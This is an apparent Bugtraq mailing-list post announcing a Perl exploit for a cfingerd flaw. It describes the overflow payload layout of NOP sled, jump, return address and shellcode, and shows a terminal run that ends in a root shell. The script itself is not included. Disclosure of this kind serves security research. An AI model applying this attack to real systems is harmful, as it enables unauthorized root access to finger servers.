Dear bugtraq readers,

This is another exploit for the flaw found by Steven Van Acker.
http://www.securityfocus.com/archive/1/192844

In order to allow for more nops, I have constructed the payload like this:

<82 nops><jmp 0x4><retaddr><shellcode>

[teleh0r@localhost teleh0r]$ ./cfingerd-exploit.pl -s 1
Address: 0xbffff46c
Exploit attempt succeeded!
[teleh0r@localhost teleh0r]#

Tested against cfingerd 1.4.3-8.

Sincerely yours,
teleh0r
http://www.digit-labs.org/teleh0r/
cfingerd-exploit.pl